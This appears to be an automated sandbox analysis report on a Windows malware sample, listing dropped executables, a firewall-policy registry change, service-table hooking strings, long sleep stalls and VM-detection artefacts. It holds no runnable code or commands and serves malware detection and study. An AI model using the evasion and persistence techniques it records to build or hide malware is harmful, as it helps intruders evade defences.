        Source: clmaq.pif.0.drStatic PE information: section name: .text entropy: 7.9869914828814625

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile created: C:\clmaq.pifJump to dropped file
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile created: C:\Users\user\AppData\Local\Temp\rkuso.exeJump to dropped file
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile created: C:\Users\user\AppData\Local\Temp\odnhm.exeJump to dropped file
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeFile created: C:\clmaq.pifJump to dropped file
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: RHxJqGoGFB.exeBinary or memory string: KeServiceDescriptorTable
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: KeServiceDescriptorTable
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeStalling execution: Execution stalls by calling Sleepgraph_0-9277
        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE11179U
        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X64\WINDBG.EXE11179
        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\WINDOWS KITS\10\DEBUGGERS\X86\WINDBG.EXE12392
        Source: SearchApp.exe, 00000013.00000000.2135580093.0000024B5A743000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: {6D809377-6AF0-444B-8957-A3773F02200E}\SUPERANTISPYWARE\SUPERANTISPYWARE.EXE11328
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 360000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeWindow / User API: threadDelayed 4899Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeWindow / User API: threadDelayed 3039Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
        Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 869Jump to behavior
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeWindow / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeWindow / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeWindow / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeWindow / User API: threadDelayed 9997
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeWindow / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeWindow / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeWindow / User API: threadDelayed 9998
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exeWindow / User API: threadDelayed 9998
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rkuso.exeJump to dropped file
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\odnhm.exeJump to dropped file
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeDropped PE file which has not been started: C:\clmaq.pifJump to dropped file
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-9065
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7348Thread sleep time: -2508288s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7372Thread sleep time: -120000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7380Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7384Thread sleep time: -61107s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7400Thread sleep time: -300000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7388Thread sleep time: -100000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7512Thread sleep time: -2040000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7512Thread sleep time: -91000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7380Thread sleep time: -840000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7516Thread sleep time: -1940000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7516Thread sleep time: -3960000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7380Thread sleep time: -10800000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7384Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7376Thread sleep time: -900000s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exe TID: 7348Thread sleep time: -1555968s >= -30000sJump to behavior
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7864Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7864Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7860Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7884Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7248Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7872Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7244Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7964Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7964Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7948Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 4416Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7960Thread sleep count: 9997 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7960Thread sleep time: -99970000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7876Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 8004Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 3272Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 3272Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 4928Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 2128Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 6048Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 6048Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 3052Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7724Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7724Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 1004Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7720Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 5552Thread sleep count: 9998 > 30
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 5552Thread sleep time: -99980000s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7700Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe TID: 7696Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_008FA2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread,0_2_008FA2F5
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeCode function: 0_2_00901060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep,0_2_00901060
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 61107Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 300000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 120000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 360000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Users\user\Desktop\RHxJqGoGFB.exeThread delayed: delay time: 900000Jump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\userJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCacheJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppDataJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
        Source: C:\Windows\System32\RuntimeBroker.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
        Source: explorer.exe, 0000000D.00000000.1887146346.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
        Source: SearchApp.exe, 00000013.00000000.1962289906.0000024340FB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dx0ma3d6fxrucbibtqempqemuae&or=w
        Source: SearchApp.exe, 00000013.00000000.2110545083.0000024B59D34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: /rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: explorer.exe, 0000000D.00000000.1880009773.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: SearchApp.exe, 00000013.00000000.1990602343.0000024B43440000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-v
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;I!
        Source: SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wes
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000043E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1863871375.0000019E29F00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: SearchApp.exe, 00000013.00000000.2033767665.0000024B54FD2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 00000013.00000000.1963746706.00000243411CA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1955650255.0000024339C3F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2081086933.0000024B56C20000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2136705344.0000024B5A7FA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2119297571.0000024B59F10000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1959774579.00000243400AB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1984144267.0000024B425C1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 00000013.00000000.2055424772.0000024B55920000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
        Source: svchost.exe, 00000009.00000000.1857082282.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;nlse]
        Source: dwm.exe, 00000005.00000000.1720224173.000002BAAA00C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000S
        Source: explorer.exe, 0000000D.00000003.3107470432.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: SearchApp.exe, 00000013.00000000.2096567068.0000024B5866C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1991532239.0000024B44184000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.2119822753.0000024B59F87000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1988601679.0000024B42D43000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"892FA07886414BDF8EE1764A59FF39C6","ConversationId":"21139c92-d559-45ad-9d8f-73e2a64bf7e7","LogicalId":"30363daf-0e99-4b56-afae-f0c5eee8522a","tid":"651d53d035ec4c7eba14a4092e8aedb0","sid":"193A581F83766B4319784BBF829B6A16","uid":"","muid":"6666694284484FA1B35CCB433D42E997","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651d53d035ec4c7eba14a4092e8aedb0 Ref B: MWHEEEAP0024F6D Ref C: 2023-10-04T12:00:16Z","vs":{"BAW12":"BFBBCEJIT2","BAW2":"BFBSPRC","BAW5":"PREMSBCUSTVERT","BAW7":"BFBPROWSBINITCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBBCEJIT":"1","FEATURE.BFBBCEJIT2":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBREFRPLAN":"1","FEATURE.BFBSPRC":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSAAUTOJOIN":"1","FEATURE.MSBDSBIGLEAM":"1","FEATURE.MSBDSBORGV2":"1","FEATURE.MSBDSBORGV2CO":"1","FEATURE.MSBWDSBI920T1":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-T":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.03.39942242"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
        Source: SearchApp.exe, 00000013.00000000.1962289906.0000024340FB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=wQ%
        Source: SearchApp.exe, 00000013.00000000.2002896960.0000024B44457000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmui
        Source: SearchApp.exe, 00000013.00000000.1990602343.0000024B43440000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: hyper-vOs and f
        Source: SearchApp.exe, 00000013.00000000.2002896960.0000024B44457000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware.Workstation.vmplayershell:RecycleBinFolderVMware.Workstation.vmuiE7CF176E110C211Bcom.squirrel.atom.atom8132
        Source: SearchApp.exe, 00000013.00000000.1982125525.0000024B422F2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=ww
        Source: svchost.exe, 00000009.00000000.1857045452.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1958382535.000002433B786000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
